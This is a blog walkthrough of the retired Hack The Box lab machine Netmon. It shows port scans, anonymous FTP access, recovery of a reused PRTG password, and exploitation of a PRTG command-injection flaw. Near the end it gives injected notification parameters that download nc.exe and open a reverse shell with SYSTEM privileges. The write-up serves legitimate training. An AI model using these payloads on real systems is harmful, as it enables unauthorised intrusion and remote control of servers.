This post documents the complete walkthrough of Netmon, a retired vulnerable VM created by mrb3n, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.

On this post


Netmon is a retired vulnerable VM from Hack The Box.

Information Gathering

Let’s start with a masscan probe to establish the open ports in the host.

# masscan -e tun0 -p1-65535,U:1-65535 --rate=700

Starting masscan 1.0.4 ( at 2019-03-10 13:41:15 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 49666/tcp on
Discovered open port 49664/tcp on
Discovered open port 49677/tcp on
Discovered open port 49667/tcp on
Discovered open port 49665/tcp on
Discovered open port 52337/tcp on
Discovered open port 5985/tcp on
Discovered open port 139/tcp on
Discovered open port 47001/tcp on
Discovered open port 80/tcp on
Discovered open port 445/tcp on
Discovered open port 49668/tcp on
Discovered open port 21/tcp on
Discovered open port 135/tcp on
Discovered open port 53099/tcp on

Whoa. masscan finds many open ports. Let’s do one better with nmap scanning the discovered ports to see what services are available.

# nmap -n -v -Pn -p21,80,135,139,445,5985,47001,49664,49665,49666,49667,49668,49677,52337,53099 -A --reason -oN nmap.txt
21/tcp    open   ftp          syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-03-19  12:18AM                 1024 .rnd
| 02-25-19  10:15PM       <DIR>          inetpub
| 07-16-16  09:18AM       <DIR>          PerfLogs
| 02-25-19  10:56PM       <DIR>          Program Files
| 02-03-19  12:28AM       <DIR>          Program Files (x86)
| 02-03-19  08:08AM       <DIR>          Users
|_02-25-19  11:49PM       <DIR>          Windows
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open   http         syn-ack ttl 127 Indy httpd (Paessler PRTG bandwidth monitor)
|_http-favicon: Unknown favicon MD5: 36B3EF286FA4BEFBB797A0966B456479
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: PRTG/
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-trane-info: Problem with XML parsing of /evox/about
135/tcp   open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open   netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open   microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp  open   http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open   http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
49677/tcp open   msrpc        syn-ack ttl 127 Microsoft Windows RPC
52337/tcp closed unknown      reset ttl 127
53099/tcp closed unknown      reset ttl 127
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-03-10 13:48:31
|_  start_date: 2019-03-10 13:32:38

Since anonymous FTP login is allowed, let’s go with that first.

File Transfer Protocol

To my pleasant surprise, C:\Users\Public is available.


And guess what, user.txt is here!


PRTG Network Monitor

Moving on to the http service, this is how it looks like.


In conjunction with the official security advisory and the location of the various configuration files, I was able to uncover a plaintext password from the file below.


Here’s the plaintext password.


And since this is a backup and knowing administrators increment the year for convenience’s sake, the password may be [email protected]. Let’s give it a shot.



PRTG < 18.2.39 Command Injection Vulnerability

During my research for vulnerability related to PRTG, I chanced upon this blog discussing command injection vulnerability, with SYSTEM privileges no less.

Follow the instructions to create a custom notification with the following parameters.

test.txt; Invoke-WebRequest -OutFile c:\Users\Public\Downloads\nc.exe

If you’ve read the blog carefully, you’ll realize certain characters are encoded. As such, I’m avoiding certain bad characters, if you will, to download a copy of nc.exe to c:\Users\Public\Downloads with PowerShell.

Verify that nc.exe is indeed downloaded.


Next, we use the following parameters to run a reverse shell back to us.

test.txt; c:\Users\Public\Downloads\nc.exe 1234 -e cmd.exe


Getting root.txt is trivial when you have SYSTEM privileges.